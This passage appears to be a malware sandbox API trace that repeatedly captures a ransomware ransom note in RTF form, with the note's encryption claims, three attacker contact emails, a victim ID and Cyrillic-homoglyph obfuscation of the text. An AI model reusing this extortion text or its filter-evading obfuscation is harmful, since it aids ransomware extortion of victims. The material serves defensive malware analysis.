\\f1\\lang1049\\'ee\\f0\\lang1033 ur r\\f1\\lang1049\\'e5\\f0\\lang1033 sp\\f1\\lang1049\\'ee\\f0\\lang1033 ns\\f1\\lang1049\\'e5\\f0\\lang1033 f\\f1\\lang1049\\'ee\\f0\\lang1033 r y\\f1\\lang1049\\'ee\\f0\\lang1033 ur c\\f1\\lang1049\\'ee\\f0\\lang1033 nfid\\f1\\lang1049\\'e5\\f0\\lang1033 n\\f1\\lang1049\\'f1\\'e5\\f0\\lang1033 .\\par\r\nOf course you will receive all the necessary instructions h\\f1\\lang1049\\'ee\\f0\\lang1033 w t\\f1\\lang1049\\'ee\\f0\\lang1033 d\\f1\\lang1049\\'e5\\f0\\lang1033 cr\\f1\\lang1049\\'f3\\f0\\lang1033 pt y\\f1\\lang1049\\'ee\\f0\\lang1033 ur fil\\f1\\lang1049\\'e5\\f0\\lang1033 s!\\par\r\n\\par\r\n\\cf1\\b Important!\\par\r\n\\cf0 Pl\\f1\\lang1049\\'e5\\'e0\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 n\\f1\\lang1049\\'ee\\f0\\lang1033 te that we are professionals and just doing our job!\\par\r\nPlease d\\f1\\lang1049\\'ee\\f0\\lang1033 n\\f1\\lang1049\\'ee\\f0\\lang1033 t w\\f1\\lang1049\\'e0\\f0\\lang1033 st\\f1\\lang1049\\'e5\\f0\\lang1033 th\\f1\\lang1049\\'e5\\f0\\lang1033 tim\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e0\\f0\\lang1033 nd d\\f1\\lang1049\\'ee\\f0\\lang1033 n\\f1\\lang1049\\'ee\\f0\\lang1033 t tr\\f1\\lang1049\\'f3\\f0\\lang1033 to d\\f1\\lang1049\\'e5\\'f1\\'e5\\f0\\lang1033 ive us - it will r\\f1\\lang1049\\'e5\\f0\\lang1033 sult \\f1\\lang1049\\'ee\\f0\\lang1033 nly pri\\f1\\lang1049\\'f1\\'e5\\f0\\lang1033 incr\\f1\\lang1049\\'e5\\'e0\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 !\\par\r\nW\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e0\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 alw\\f1\\lang1049\\'e0\\'f3\\f0\\lang1033 s \\f1\\lang1049\\'ee\\f0\\lang1033 p\\f1\\lang1049\\'e5\\f0\\lang1033 n\\f1\\lang1049\\'e5\\f0\\lang1033 d f\\f1\\lang1049\\'ee\\f0\\lang1033 r di\\f1\\lang1049\\'e0\\f0\\lang1033 l\\f1\\lang1049\\'ee\\f0\\lang1033 g \\f1\\lang1049\\'e0\\f0\\lang1033 nd r\\f1\\lang1049\\'e5\\'e0\\f0\\lang1033 dy t\\f1\\lang1049\\'ee\\f0\\lang1033 h\\f1\\lang1049\\'e5\\f0\\lang1033 lp \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 u.\\par\r\n\\cf2\\fs28 uqpweo38\\cf0\\f1\\fs32\\lang1049\\par\r\n}\r\n", cchWideChar=7247, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 7247 [0066.277] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="{\\rtf1\\ansi\\ansicpg1251\\deff0\\nouicompat\\deflang1049{\\fonttbl{\\f0\\fnil\\fcharset0 Calibri;}{\\f1\\fnil\\fcharset204 Calibri;}}\r\n{\\colortbl ;\\red255\\green0\\blue0;\\red255\\green255\\blue255;}\r\n{\\*\\generator Riched20 10.0.15063}\\viewkind4\\uc1 \r\n\\pard\\ri-74\\sl240\\slmult1\\qc\\tx8378\\b\\f0\\fs24\\lang1033 ALL YOUR VALUABLE DATA WAS ENCRYPTED!\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\par\r\n\\b0 All y\\f1\\lang1049\\'ee\\f0\\lang1033 ur fil\\f1\\lang1049\\'e5\\f0\\lang1033 s w\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 n\\f1\\lang1049\\'f1\\f0\\lang1033 r\\f1\\lang1049\\'f3\\f0\\lang1033 pt\\f1\\lang1049\\'e5\\f0\\lang1033 d with str\\f1\\lang1049\\'ee\\f0\\lang1033 ng cr\\f1\\lang1049\\'f3\\f0\\lang1033 pt\\f1\\lang1049\\'ee\\f0\\lang1033 \\f1\\lang1049\\'e0\\f0\\lang1033 lg\\f1\\lang1049\\'ee\\f0\\lang1033 rithm \\f1\\lang1049\\'c0\\'c5\\f0\\lang1033 S-256 + RS\\f1\\lang1049\\'c0\\f0\\lang1033 -2048.\\par\r\nPl\\f1\\lang1049\\'e5\\'e0\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 b\\f1\\lang1049\\'e5\\f0\\lang1033 sur\\f1\\lang1049\\'e5\\f0\\lang1033 th\\f1\\lang1049\\'e0\\f0\\lang1033 t y\\f1\\lang1049\\'ee\\f0\\lang1033 ur fil\\f1\\lang1049\\'e5\\f0\\lang1033 s \\f1\\lang1049\\'e0\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 n\\f1\\lang1049\\'ee\\f0\\lang1033 t br\\f1\\lang1049\\'ee\\f0\\lang1033 k\\f1\\lang1049\\'e5\\f0\\lang1033 n \\f1\\lang1049\\'e0\\f0\\lang1033 nd \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 u c\\f1\\lang1049\\'e0\\f0\\lang1033 n r\\f1\\lang1049\\'e5\\f0\\lang1033 st\\f1\\lang1049\\'ee\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 th\\f1\\lang1049\\'e5\\f0\\lang1033 m t\\f1\\lang1049\\'ee\\f0\\lang1033 d\\f1\\lang1049\\'e0\\f0\\lang1033 y.\\par\r\n\\par\r\nIf y\\f1\\lang1049\\'ee\\f0\\lang1033 u r\\f1\\lang1049\\'e5\\'e0\\f0\\lang1033 ll\\f1\\lang1049\\'f3\\f0\\lang1033 w\\f1\\lang1049\\'e0\\f0\\lang1033 nt t\\f1\\lang1049\\'ee\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 st\\f1\\lang1049\\'ee\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 y\\f1\\lang1049\\'ee\\f0\\lang1033 ur fil\\f1\\lang1049\\'e5\\f0\\lang1033 s pl\\f1\\lang1049\\'e5\\'e0\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 writ\\f1\\lang1049\\'e5\\f0\\lang1033 us t\\f1\\lang1049\\'ee\\f0\\lang1033 th\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 -m\\f1\\lang1049\\'e0\\f0\\lang1033 ils:\\par\r\n\\b\\fs28 BobGreen85@criptext.com\\par\r\nBobGreen85@aol.com\\par\r\nBobGreen85@tutanota.com\\par\r\n\\b0\\fs24 In subj\\f1\\lang1049\\'e5\\f0\\lang1033 ct lin\\f1\\lang1049\\'e5\\f0\\lang1033 writ\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 ur ID: \\b\\fs28 2660EAA9CA5C3071\\fs24\\par\r\n\\par\r\n\\cf1 Imp\\f1\\lang1049\\'ee\\f0\\lang1033 rt\\f1\\lang1049\\'e0\\f0\\lang1033 nt!\\cf0 Pl\\f1\\lang1049\\'e5\\'e0\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 nd y\\f1\\lang1049\\'ee\\f0\\lang1033 ur m\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 t\\f1\\lang1049\\'ee\\f0\\lang1033 \\f1\\lang1049\\'e0\\f0\\lang1033 ll \\f1\\lang1049\\'ee\\f0\\lang1033 f \\f1\\lang1049\\'ee\\f0\\lang1033 ur 3 \\f1\\lang1049\\'e5\\f0\\lang1033 -m\\f1\\lang1049\\'e0\\f0\\lang1033 il \\f1\\lang1049\\'e0\\f0\\lang1033 ddr\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e5\\f0\\lang1033 s. This is r\\f1\\lang1049\\'e5\\'e0\\f0\\lang1033 ll\\f1\\lang1049\\'f3\\f0\\lang1033 imp\\f1\\lang1049\\'ee\\f0\\lang1033 rt\\f1\\lang1049\\'e0\\f0\\lang1033 nt b\\f1\\lang1049\\'e5\\f0\\lang1033 c\\f1\\lang1049\\'e0\\f0\\lang1033 us\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'ee\\f0\\lang1033 f d\\f1\\lang1049\\'e5\\f0\\lang1033 liv\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'f3\\f0\\lang1033 pr\\f1\\lang1049\\'ee\\f0\\lang1033 bl\\f1\\lang1049\\'e5\\f0\\lang1033 ms \\f1\\lang1049\\'ee\\f0\\lang1033 f s\\f1\\lang1049\\'ee\\f0\\lang1033 m\\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033 il s\\f1\\lang1049\\'e5\\f0\\lang1033 rvi\\f1\\lang1049\\'f1\\'e5\\f0\\lang1033 s!\\par\r\n\\cf1 Important!\\cf0 If you haven't received a response from us within 24 hours, please try to use a different email service\\f1\\lang1049 (\\f0\\lang1033 Gmail, Yahoo, AOL, etc\\f1\\lang1049 )\\f0\\lang1033 .\\par\r\n\\cf1 Important!\\cf0 Please check your SPAM folder each time you wait for our response! If you find our email in the SPAM folder please move it to your Inbox.\\par\r\n\\cf1 Important! \\cf0 We are always in touch and ready to help you as soon as possible!\\par\r\n\\par\r\n\\b0\\f1\\lang1049\\'c0\\f0\\lang1033 tt\\f1\\lang1049\\'e0\\f0\\lang1033 ch up t\\f1\\lang1049\\'ee\\f0\\lang1033 3 sm\\f1\\lang1049\\'e0\\f0\\lang1033 ll \\f1\\lang1049\\'e5\\f0\\lang1033 ncr\\f1\\lang1049\\'f3\\f0\\lang1033 pt\\f1\\lang1049\\'e5\\f0\\lang1033 d fil\\f1\\lang1049\\'e5\\f0\\lang1033 s f\\f1\\lang1049\\'ee\\f0\\lang1033 r fr\\f1\\lang1049\\'e5\\'e5\\f0\\lang1033 t\\f1\\lang1049\\'e5\\f0\\lang1033 st d\\f1\\lang1049\\'e5\\'f1\\f0\\lang1033 ryption. Pl\\f1\\lang1049\\'e5\\'e0\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 n\\f1\\lang1049\\'ee\\f0\\lang1033 te th\\f1\\lang1049\\'e0\\f0\\lang1033 t th\\f1\\lang1049\\'e5\\f0\\lang1033 fil\\f1\\lang1049\\'e5\\f0\\lang1033 s y\\f1\\lang1049\\'ee\\f0\\lang1033 u s\\f1\\lang1049\\'e5\\f0\\lang1033 nd us sh\\f1\\lang1049\\'ee\\f0\\lang1033 uld n\\f1\\lang1049\\'ee\\f0\\lang1033 t c\\f1\\lang1049\\'ee\\f0\\lang1033 nt\\f1\\lang1049\\'e0\\f0\\lang1033 in \\f1\\lang1049\\'e0\\f0\\lang1033 n\\f1\\lang1049\\'f3\\f0\\lang1033 v\\f1\\lang1049\\'e0\\f0\\lang1033 lu\\f1\\lang1049\\'e0\\f0\\lang1033 bl\\f1\\lang1049\\'e5\\f0\\lang1033 inf\\f1\\lang1049\\'ee\\f0\\lang1033 rm\\f1\\lang1049\\'e0\\f0\\lang1033 ti\\f1\\lang1049\\'ee\\f0\\lang1033 n.\\f1\\lang1049 \\f0\\lang1033 W\\f1\\lang1049\\'e5\\f0\\lang1033 will s\\f1\\lang1049\\'e5\\f0\\lang1033 nd y\\f1\\lang1049\\'ee\\f0\\lang1033 u t\\f1\\lang1049\\'e5\\f0\\lang1033 st d\\f1\\lang1049\\'e5\\f0\\lang1033 cr\\f1\\lang1049\\'f3\\f0\\lang1033 pt\\f1\\lang1049\\'e5\\f0\\lang1033 d files in \\f1\\lang1049\\'ee\\f0\\lang1033 ur r\\f1\\lang1049\\'e5\\f0\\lang1033 sp\\f1\\lang1049\\'ee\\f0\\lang1033 ns\\f1\\lang1049\\'e5\\f0\\lang1033 f\\f1\\lang1049\\'ee\\f0\\lang1033 r y\\f1\\lang1049\\'ee\\f0\\lang1033 ur c\\f1\\lang1049\\'ee\\f0\\lang1033 nfid\\f1\\lang1049\\'e5\\f0\\lang1033 n\\f1\\lang1049\\'f1\\'e5\\f0\\lang1033 .\\par\r\nOf course you will receive all the necessary instructions h\\f1\\lang1049\\'ee\\f0\\lang1033 w t\\f1\\lang1049\\'ee\\f0\\lang1033 d\\f1\\lang1049\\'e5\\f0\\lang1033 cr\\f1\\lang1049\\'f3\\f0\\lang1033 pt y\\f1\\lang1049\\'ee\\f0\\lang1033 ur fil\\f1\\lang1049\\'e5\\f0\\lang1033 s!\\par\r\n\\par\r\n\\cf1\\b Important!\\par\r\n\\cf0 Pl\\f1\\lang1049\\'e5\\'e0\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 n\\f1\\lang1049\\'ee\\f0\\lang1033 te that we are professionals and just doing our job!\\par\r\nPlease d\\f1\\lang1049\\'ee\\f0\\lang1033 n\\f1\\lang1049\\'ee\\f0\\lang1033 t w\\f1\\lang1049\\'e0\\f0\\lang1033 st\\f1\\lang1049\\'e5\\f0\\lang1033 th\\f1\\lang1049\\'e5\\f0\\lang1033 tim\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e0\\f0\\lang1033 nd d\\f1\\lang1049\\'ee\\f0\\lang1033 n\\f1\\lang1049\\'ee\\f0\\lang1033 t tr\\f1\\lang1049\\'f3\\f0\\lang1033 to d\\f1\\lang1049\\'e5\\'f1\\'e5\\f0\\lang1033 ive us - it will r\\f1\\lang1049\\'e5\\f0\\lang1033 sult \\f1\\lang1049\\'ee\\f0\\lang1033 nly pri\\f1\\lang1049\\'f1\\'e5\\f0\\lang1033 incr\\f1\\lang1049\\'e5\\'e0\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 !\\par\r\nW\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e0\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 alw\\f1\\lang1049\\'e0\\'f3\\f0\\lang1033 s \\f1\\lang1049\\'ee\\f0\\lang1033 p\\f1\\lang1049\\'e5\\f0\\lang1033 n\\f1\\lang1049\\'e5\\f0\\lang1033 d f\\f1\\lang1049\\'ee\\f0\\lang1033 r di\\f1\\lang1049\\'e0\\f0\\lang1033 l\\f1\\lang1049\\'ee\\f0\\lang1033 g \\f1\\lang1049\\'e0\\f0\\lang1033 nd r\\f1\\lang1049\\'e5\\'e0\\f0\\lang1033 dy t\\f1\\lang1049\\'ee\\f0\\lang1033 h\\f1\\lang1049\\'e5\\f0\\lang1033 lp \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 u.\\par\r\n\\cf2\\fs28 uqpweo38\\cf0\\f1\\fs32\\lang1049\\par\r\n}\r\n", cchWideChar=7247, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 7247 [0066.277] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="{\\rtf1\\ansi\\ansicpg1251\\deff0\\nouicompat\\deflang1049{\\fonttbl{\\f0\\fnil\\fcharset0 Calibri;}{\\f1\\fnil\\fcharset204 Calibri;}}\r\n{\\colortbl ;\\red255\\green0\\blue0;\\red255\\green255\\blue255;}\r\n{\\*\\generator Riched20 10.0.15063}\\viewkind4\\uc1 \r\n\\pard\\ri-74\\sl240\\slmult1\\qc\\tx8378\\b\\f0\\fs24\\lang1033 ALL YOUR VALUABLE DATA WAS ENCRYPTED!\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\par\r\n\\b0 All y\\f1\\lang1049\\'ee\\f0\\lang1033 ur fil\\f1\\lang1049\\'e5\\f0\\lang1033 s w\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 n\\f1\\lang1049\\'f1\\f0\\lang1033 r\\f1\\lang1049\\'f3\\f0\\lang1033 pt\\f1\\lang1049\\'e5\\f0\\lang1033 d with str\\f1\\lang1049\\'ee\\f0\\lang1033 ng cr\\f1\\lang1049\\'f3\\f0\\lang1033 pt\\f1\\lang1049\\'ee\\f0\\lang1033 \\f1\\lang1049\\'e0\\f0\\lang1033 lg\\f1\\lang1049\\'ee\\f0\\lang1033 rithm \\f1\\lang1049\\'c0\\'c5\\f0\\lang1033 S-256 + RS\\f1\\lang1049\\'c0\\f0\\lang1033 -2048.\\par\r\nPl\\f1\\lang1049\\'e5\\'e0\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 b\\f1\\lang1049\\'e5\\f0\\lang1033 sur\\f1\\lang1049\\'e5\\f0\\lang1033 th\\f1\\lang1049\\'e0\\f0\\lang1033 t y\\f1\\lang1049\\'ee\\f0\\lang1033 ur fil\\f1\\lang1049\\'e5\\f0\\lang1033 s \\f1\\lang1049\\'e0\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 n\\f1\\lang1049\\'ee\\f0\\lang1033 t br\\f1\\lang1049\\'ee\\f0\\lang1033 k\\f1\\lang1049\\'e5\\f0\\lang1033 n \\f1\\lang1049\\'e0\\f0\\lang1033 nd \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 u c\\f1\\lang1049\\'e0\\f0\\lang1033 n r\\f1\\lang1049\\'e5\\f0\\lang1033 st\\f1\\lang1049\\'ee\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 th\\f1\\lang1049\\'e5\\f0\\lang1033 m t\\f1\\lang1049\\'ee\\f0\\lang1033 d\\f1\\lang1049\\'e0\\f0\\lang1033 y.\\par\r\n\\par\r\nIf y\\f1\\lang1049\\'ee\\f0\\lang1033 u r\\f1\\lang1049\\'e5\\'e0\\f0\\lang1033 ll\\f1\\lang1049\\'f3\\f0\\lang1033 w\\f1\\lang1049\\'e0\\f0\\lang1033 nt t\\f1\\lang1049\\'ee\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 st\\f1\\lang1049\\'ee\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 y\\f1\\lang1049\\'ee\\f0\\lang1033 ur fil\\f1\\lang1049\\'e5\\f0\\lang1033 s pl\\f1\\lang1049\\'e5\\'e0\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 writ\\f1\\lang1049\\'e5\\f0\\lang1033 us t\\f1\\lang1049\\'ee\\f0\\lang1033 th\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 -m\\f1\\lang1049\\'e0\\f0\\lang1033 ils:\\par\r\n\\b\\fs28 BobGreen85@criptext.com\\par\r\nBobGreen85@aol.com\\par\r\nBobGreen85@tutanota.com\\par\r\n\\b0\\fs24 In subj\\f1\\lang1049\\'e5\\f0\\lang1033 ct lin\\f1\\lang1049\\'e5\\f0\\lang1033 writ\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 ur ID: \\b\\fs28 2660EAA9CA5C3071\\fs24\\par\r\n\\par\r\n\\cf1 Imp\\f1\\lang1049\\'ee\\f0\\lang1033 rt\\f1\\lang1049\\'e0\\f0\\lang1033 nt!\\cf0 Pl\\f1\\lang1049\\'e5\\'e0\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 nd y\\f1\\lang1049\\'ee\\f0\\lang1033 ur m\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 t\\f1\\lang1049\\'ee\\f0\\lang1033 \\f1\\lang1049\\'e0\\f0\\lang1033 ll \\f1\\lang1049\\'ee\\f0\\lang1033 f \\f1\\lang1049\\'ee\\f0\\lang1033 ur 3 \\f1\\lang1049\\'e5\\f0\\lang1033 -m\\f1\\lang1049\\'e0\\f0\\lang1033 il \\f1\\lang1049\\'e0\\f0\\lang1033 ddr\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e5\\f0\\lang1033 s. This is r\\f1\\lang1049\\'e5\\'e0\\f0\\lang1033 ll\\f1\\lang1049\\'f3\\f0\\lang1033 imp\\f1\\lang1049\\'ee\\f0\\lang1033 rt\\f1\\lang1049\\'e0\\f0\\lang1033 nt b\\f1\\lang1049\\'e5\\f0\\lang1033 c\\f1\\lang1049\\'e0\\f0\\lang1033 us\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'ee\\f0\\lang1033 f d\\f1\\lang1049\\'e5\\f0\\lang1033 liv\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'f3\\f0\\lang1033 pr\\f1\\lang1049\\'ee\\f0\\lang1033 bl\\f1\\lang1049\\'e5\\f0\\lang1033 ms \\f1\\lang1049\\'ee\\f0\\lang1033 f s\\f1\\lang1049\\'ee\\f0\\lang1033 m\\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033 il s\\f1\\lang1049\\'e5\\f0\\lang1033 rvi\\f1\\lang1049\\'f1\\'e5\\f0\\lang1033 s!\\par\r\n\\cf1 Important!\\cf0 If you haven't received a response from us within 24 hours, please try to use a different email service\\f1\\lang1049 (\\f0\\lang1033 Gmail, Yahoo, AOL, etc\\f1\\lang1049 )\\f0\\lang1033 .\\par\r\n\\cf1 Important!\\cf0 Please check your SPAM folder each time you wait for our response! If you find our email in the SPAM folder please move it to your Inbox.\\par\r\n\\cf1 Important! \\cf0 We are always in touch and ready to help you as soon as possible!\\par\r\n\\par\r\n\\b0\\f1\\lang1049\\'c0\\f0\\lang1033 tt\\f1\\lang1049\\'e0\\f0\\lang1033 ch up t\\f1\\lang1049\\'ee\\f0\\lang1033 3 sm\\f1\\lang1049\\'e0\\f0\\lang1033 ll \\f1\\lang1049\\'e5\\f0\\lang1033 ncr\\f1\\lang1049\\'f3\\f0\\lang1033 pt\\f1\\lang1049\\'e5\\f0\\lang1033 d fil\\f1\\lang1049\\'e5\\f0\\lang1033 s f\\f1\\lang1049\\'ee\\f0\\lang1033 r fr\\f1\\lang1049\\'e5\\'e5\\f0\\lang1033 t\\f1\\lang1049\\'e5\\f0\\lang1033 st d\\f1\\lang1049\\'e5\\'f1\\f0\\lang1033 ryption. Pl\\f1\\lang1049\\'e5\\'e0\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 n\\f1\\lang1049\\'ee\\f0\\lang1033 te th\\f1\\lang1049\\'e0\\f0\\lang1033 t th\\f1\\lang1049\\'e5\\f0\\lang1033 fil\\f1\\lang1049\\'e5\\f0\\lang1033 s y\\f1\\lang1049\\'ee\\f0\\lang1033 u s\\f1\\lang1049\\'e5\\f0\\lang1033 nd us sh\\f1\\lang1049\\'ee\\f0\\lang1033 uld n\\f1\\lang1049\\'ee\\f0\\lang1033 t c\\f1\\lang1049\\'ee\\f0\\lang1033 nt\\f1\\lang1049\\'e0\\f0\\lang1033 in \\f1\\lang1049\\'e0\\f0\\lang1033 n\\f1\\lang1049\\'f3\\f0\\lang1033 v\\f1\\lang1049\\'e0\\f0\\lang1033 lu\\f1\\lang1049\\'e0\\f0\\lang1033 bl\\f1\\lang1049\\'e5\\f0\\lang1033 inf\\f1\\lang1049\\'ee\\f0\\lang1033 rm\\f1\\lang1049\\'e0\\f0\\lang1033 ti\\f1\\lang1049\\'ee\\f0\\lang1033 n.\\f1\\lang1049 \\f0\\lang1033 W\\f1\\lang1049\\'e5\\f0\\lang1033 will s\\f1\\lang1049\\'e5\\f0\\lang1033 nd y\\f1\\lang1049\\'ee\\f0\\lang1033 u t\\f1\\lang1049\\'e5\\f0\\lang1033 st d\\f1\\lang1049\\'e5\\f0\\lang1033 cr\\f1\\lang1049\\'f3\\f0\\lang1033 pt\\f1\\lang1049\\'e5\\f0\\lang1033 d files in \\f1\\lang1049\\'ee\\f0\\lang1033 ur r\\f1\\lang1049\\'e5\\f0\\lang1033 sp\\f1\\lang1049\\'ee\\f0\\lang1033 ns\\f1\\lang1049\\'e5\\f0\\lang1033 f\\f1\\lang1049\\'ee\\f0\\lang1033 r y\\f1\\lang1049\\'ee\\f0\\lang1033 ur c\\f1\\lang1049\\'ee\\f0\\lang1033 nfid\\f1\\lang1049\\'e5\\f0\\lang1033 n\\f1\\lang1049\\'f1\\'e5\\f0\\lang1033 .\\par\r\nOf course you will receive all the necessary instructions h\\f1\\lang1049\\'ee\\f0\\lang1033 w t\\f1\\lang1049\\'ee\\f0\\lang1033 d\\f1\\lang1049\\'e5\\f0\\lang1033 cr\\f1\\lang1049\\'f3\\f0\\lang1033 pt y\\f1\\lang1049\\'ee\\f0\\lang1033 ur fil\\f1\\lang1049\\'e5\\f0\\lang1033 s!\\par\r\n\\par\r\n\\cf1\\b Important!\\par\r\n\\cf0 Pl\\f1\\lang1049\\'e5\\'e0\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 n\\f1\\lang1049\\'ee\\f0\\lang1033 te that we are professionals and just doing our job!\\par\r\nPlease d\\f1\\lang1049\\'ee\\f0\\lang1033 n\\f1\\lang1049\\'ee\\f0\\lang1033 t w\\f1\\lang1049\\'e0\\f0\\lang1033 st\\f1\\lang1049\\'e5\\f0\\lang1033 th\\f1\\lang1049\\'e5\\f0\\lang1033 tim\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e0\\f0\\lang1033 nd d\\f1\\lang1049\\'ee\\f0\\lang1033 n\\f1\\lang1049\\'ee\\f0\\lang1033 t tr\\f1\\lang1049\\'f3\\f0\\lang1033 to d\\f1\\lang1049\\'e5\\'f1\\'e5\\f0\\lang1033 ive us - it will r\\f1\\lang1049\\'e5\\f0\\lang1033 sult \\f1\\lang1049\\'ee\\f0\\lang1033 nly pri\\f1\\lang1049\\'f1\\'e5\\f0\\lang1033 incr\\f1\\lang1049\\'e5\\'e0\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 !\\par\r\nW\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e0\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 alw\\f1\\lang1049\\'e0\\'f3\\f0\\lang1033 s \\f1\\lang1049\\'ee\\f0\\lang1033 p\\f1\\lang1049\\'e5\\f0\\lang1033 n\\f1\\lang1049\\'e5\\f0\\lang1033 d f\\f1\\lang1049\\'ee\\f0\\lang1033 r di\\f1\\lang1049\\'e0\\f0\\lang1033 l\\f1\\lang1049\\'ee\\f0\\lang1033 g \\f1\\lang1049\\'e0\\f0\\lang1033 nd r\\f1\\lang1049\\'e5\\'e0\\f0\\lang1033 dy t\\f1\\lang1049\\'ee\\f0\\lang1033 h\\f1\\lang1049\\'e5\\f0\\lang1033 lp \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 u.\\par\r\n\\cf2\\fs28 uqpweo38\\cf0\\f1\\fs32\\lang1049\\par\r\n}\r\n", cchWideChar=7247, lpMultiByteStr=0x1ea3958, cbMultiByte=7247, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="{\\rtf1\\ansi\\ansicpg1251\\deff0\\nouicompat\\deflang1049{\\fonttbl{\\f0\\fnil\\fcharset0 Calibri;}{\\f1\\fnil\\fcharset204 Calibri;}}\r\n{\\colortbl ;\\red255\\green0\\blue0;\\red255\\green255\\blue255;}\r\n{\\*\\generator Riched20 10.0.15063}\\viewkind4\\uc1 \r\n\\pard\\ri-74\\sl240\\slmult1\\qc\\tx8378\\b\\f0\\fs24\\lang1033 ALL YOUR VALUABLE DATA WAS ENCRYPTED!\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\par\r\n\\b0 All y\\f1\\lang1049\\'ee\\f0\\lang1033 ur fil\\f1\\lang1049\\'e5\\f0\\lang1033 s w\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 n\\f1\\lang1049\\'f1\\f0\\lang1033 r\\f1\\lang1049\\'f3\\f0\\lang1033 pt\\f1\\lang1049\\'e5\\f0\\lang1033 d with str\\f1\\lang1049\\'ee\\f0\\lang1033 ng cr\\f1\\lang1049\\'f3\\f0\\lang1033 pt\\f1\\lang1049\\'ee\\f0\\lang1033 \\f1\\lang1049\\'e0\\f0\\lang1033 lg\\f1\\lang1049\\'ee\\f0\\lang1033 rithm \\f1\\lang1049\\'c0\\'c5\\f0\\lang1033 S-256 + RS\\f1\\lang1049\\'c0\\f0\\lang1033 -2048.\\par\r\nPl\\f1\\lang1049\\'e5\\'e0\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 b\\f1\\lang1049\\'e5\\f0\\lang1033 sur\\f1\\lang1049\\'e5\\f0\\lang1033 